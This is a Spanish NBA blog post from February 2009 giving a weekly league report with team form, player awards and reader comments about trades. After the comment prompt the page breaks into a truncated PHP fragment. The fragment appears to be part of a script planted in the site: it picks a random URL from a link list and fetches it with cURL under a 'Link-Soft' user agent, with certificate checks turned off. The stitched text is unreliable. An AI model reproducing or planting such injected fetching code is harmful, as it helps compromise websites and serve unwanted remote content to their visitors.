Informe Semanal TJNBA (Semana 14)

02 de February de 2009 por TheDeerHunter

Dejamos atrás la “cuesta de Enero” que, como en todo, ha afectado más a unos que a otros. Este mes será el del AllStar de Phoenix, el ecuador psicológico ya que el real lo atravesamos hace algunas fechas. También es el mes del límite de traspasos lo que significa que muchas cartas quedarán boca arriba aunque ya poco nos van a sorprender determinados equipos.

ON-FIRE:

El equipo más en forma de la liga es otra vez Boston que, tras aquella rachilla tonta, llevan casi 3 semanas sin conocer la derrota. Les quedan 33 partidos por jugar con una proyección de 66 victorias con el premio en el horizonte de asegurase la ventaja campo en playoffs, hecho que parece casi esencial viendo como van las cosas. Esperaremos a comprobar cómo queda este estudio después de sólo 3 partidos (dos de ellos contra los dos más fuertes del Oeste) en casa durante el mes de Febrero y una gira casi suicida para cualquiera que no sea los verdes.

Orlando y Spurs han culminado su espectacular mes con una semana sin mácula y destrozando rivales directos. En concreto los tejanos se han pasado por la piedra a Jazz, Suns y Hornets en 3 días consecutivos sin despeinarse demasiado y es que en lo que llevamos de año impar están dando verdadero miedo. 12-3 y la sensación de que ya nadie alberga dudas de que quedarán entre los dos primeros del oeste. No está mal para haber sido retirados en noviembre.

Otro equipo en forma es Portland aunque una de sus victorias fue contra Clippers y otra contra Bobcats. El caso es que cada día tienen más asegurada su plaza de postemporada y cada día parecen más fuertes. Oden, Roy, Rudy… se intuye que puede ser un mes especial para ellos. Dallas también ha ganado sus dos partidos de esta semana y salen muy reforzados de la convulsa semana que han experimentado sus rivales.

Finalmente nos sorprende la súbita racha de Chicago y New York. Cuidado porque en el carro de equipos que se están matando por la última plaza del Este son los Knickerbockers los que menos derrotas tienen en su casillero y los que mejor están jugando últimamente. Algo diferente es el caso de los Bulls pero, con lo que ha llovido, ambos se encuentran en situación envidiable de cara al sprint final. Un buen movimiento como de los que se está hablando para Chicago sería un punto casi definitivo.

AL TRAN-TRAN:

Los “co-líderes” de la competición, Lakers y Cavs, con trayectorias similares en cuanto a lesiones y juego, pasan por un momento de cierta inconsistencia. No obstante, ambos parecen sentirse más cómodos un pie por detrás de Celtics y su calendario inmediato no es ni de lejos tan terrorífico. Quizás éste es buen momento para lamerse la heridas… siempre que esas heridas no sean una grave lesión de rodilla.

Denver y New Orleans siguen tan cómodos como irregulares en la parte alta del cuadro del Oeste. La buena noticia es que parece claro que ellos se escaparán de la sangrienta pelea por los playoffs de su conferencia. La mala es que desde una perspectiva u otra ambos parecen moverse en el límite de su potencial.

Miami le ha bastado con una semana de .50 para alcanzar a sus rivales más inmediatos. Si unimos refuerzos inminentes a la plantilla y un nefasto estado de los clasificados a su alrededor, el futuro inmediato parece bastante prometedor. No podemos decir lo mismo de Philly o Milwaukee que, unos por contar con cierto jugador y otros por no contar con otro sufren para mantener lo que tienen.

EL BORDE DEL ABISMO:

Hay ciertos equipos que parecen empeñados en complicarse la existencia. En el caso de los Hawks, podemos entender que les falta una pieza clave cuando no andan tan sobrados de recursos. Los Rockets siempre tendrán alguna excusa en el tintero para justificar sus miserias. El caso de Detroit o de Phoenix directamente no se entiende aunque al menos ambos cuentan con la red de seguridad que supone unos rivales que les aprietan tan poco en la clasificación como los que disfrutan ahora. Quizás únicamente tienen lo poco que muestran y al final un cruce en primera ronda contra ellos no es tan fiero como se pintaba.

Lamentablemente por detrás la cosa está todavía peor… Utah, New Jersey, Charlotte, Indiana, Toronto… querer y no poder.

EL POZO:

Los de siempre. Por un lado, Timberwolves y Warriors que ya no tienen nada que hacer aunque dieran cierta muestra de pundonor en las últimas semanas. Algo que se les agradece, por cierto.

Por el otro, Wizards, Clippers, Thunder, Kings y Grizzlies. Lo mejor que podemos decir de ellos es la solidaridad que rezuman. Tan simpáticos son que, en ocasiones, hasta se reparten alguna victoria los unos con los otros. Esperamos que no sea para evitar que nadie piense que su único objetivo ahora es perder el máximo número de partidos posibles…

PREMIOS SEMANALES

MVP: Tras la severa derrota en el Staples, se presentaba una semana complicada para los Spurs y, especialmente, para Tony Parker con tres partidos ante tres de los mejores equipos del Oeste y ante, posiblemente, los tres mejores bases del mundo en la actualidad. No sólo vencieron los texanos sus tres partidos sino que el internacional francés marcó diferencias con una regularidad sensacional: 24 puntos y 6 asistencias ante los Jazz, 26 puntos y 5 asistencias ante los Suns y 25 puntos y 7 asistencias ante los Hornets. En los tres casos, Parker anotó el 50% o más de sus tiros de campo y en ninguno de ellos perdió más de 2 balones.

El rookie: Su media anotadora no ha sido tan espectacular como la de Westbrook o Eric Gordon, pero la semana de Derrick Rose se merece el premio por el solo hecho de haber conducido a sus Bulls a tres victorias, todas ellas como visitantes. Ante los Clippers hizo 21 puntos con 9 de 13 en tiros, 6 asistencias y 4 rebotes; en el cómodo triunfo ante los Kings apenas lanzó 6 veces y se dedicó a repartir juego con 11 asistencias; y coronó la semana con 26 puntos, 12 de 19 en tiros, 6 rebotes y 4 asistencias en Phoenix.

La sorpresa: Entre los mejores anotadores de la semana encontramos a Raja Bell, que se ha consolidado como uno de los hombres más importantes en los esquemas de Larry Brown. Bell ha promediado en tres partidos 20 puntos con un 56.4% en tiros, además de 4.3 rebotes y 3 asistencias.

La decepción: Los Raptors vuelven a tener problemas y Chris Bosh no parece estar en su mejor momento. En ninguno de los tres partidos jugados esta semana Bosh ha alcanzado los 20 puntos o los 10 rebotes. Además, ha acumulado 15 pérdidas por 1 sola asistencia y 1 solo robo. Anoche, ante Dwight Howard lo vimos absolutamente superado. Sólo le faltó sacar la bandera blanca en señal de rendición.

PREMIOS MENSUALES

Además de la semana se nos acabó también  Enero y por tanto es justa una mención a los mejores del mes:

MVP: 22 puntos, 14 rebotes y 2 tapones. Dwight Howard sigue en plena forma y con él los Orlando Magic que siguen entre al nivel de los mejores equipos de la liga.

Rookie: Pocas razones para sonreir en los Clippers pero hay una que brilla con luz propia: Eric Gordon ha tomado el mando de las operaciones ante la ausencia de las supuestas figuras y se ha ido a los 22 puntos por partido. ¿Cómo le afectará la vuelta de Baron Davis?

Sorpresa: 2 recuperaciones casi asombrosas ganan este título. Por un lado los Sixers de cualquiera menos Elton Brand y por el otro los Wolves de Al Jefferson y Kevin McHale.

Decepción:Muy mal mes para el otrora MVP de la liga, Steve Nash. Sus erráticas actuaciones y las del equipo que dirige, unido a su no selección para el partido de las estrellas, hacen que Enero sea un mes que el canadiense no quiera recordar durante mucho tiempo.

RAZONES PARA TRASNOCHAR

Tras la tempranera jornada dominical marcada por la SuperBowl, la NBA regresa a la normalidad (ésa que nos obliga a pasar sueño si queremos ver partidos en directo). Se juegan ocho partidos esta noche y entre ellos destacamos uno:

– Blazers @ Hornets. Las trayectorias opuestas que llevan ambos equipos (4 victorias seguidas para Blazers, 2 derrotas consecutivas para Hornets) dificultan cualquier pronóstico. New Orleans ha recuperado a David West pero Tyson Chandler seguirá de baja al menos hasta el miércoles, por lo que los locales pueden encontrar problemas para frenar a Aldridge & Oden así como las penetraciones de Roy. Pero ya sabemos de qué es capaz de Chris Paul y nos imaginamos el papelón que se le presenta a Sergio Rodríguez. A partir de las 2:00 horas sabremos si el canario sale muy mal parado.

El jugador al que recomendamos seguir de cerca es… Kobe Bryant. El escenario es inmejorable: el Madison Square Garden. Las circunstancias obligan: sin Bynum, a Kobe le corresponde asumir más responsabilidades. El rival es óptimo: los Knicks son ya un equipo 100% D’Antoni. Todo apunta a que Bryant se lucirá en el MSG, donde ya le hemos visto brillar en otras ocasiones.

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    De los que ahora aparecen como candidatos el que mas capacidad para moverse tiene son los Cavs, que tiene dos expirings, los 13 millones de Wally y 7 de Snow, veremos si se deciden.

      Citar

  2. Drheam dice:
    #2

    Que Crack este Snow..

      Citar

  3. Jabho dice:
    #3

    Pues la pena es que si creo que será muy importante ser primero en el Este, para la ventaja campo y para evitar al 3º en discordia…

    Grandes C´s, a ver que tal este mes y la visita de los amarillos. Espero alguna incorporación.

    Bynum de 8 a 12 semanas, vamos que en teoria llega bien a PO

    Y Mchale entrenador del mes… mola

      Citar

  4. MagicJohnson32 dice:
    #4

    Cielo santo, 20 kilos entre Wally y Snow, jojo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>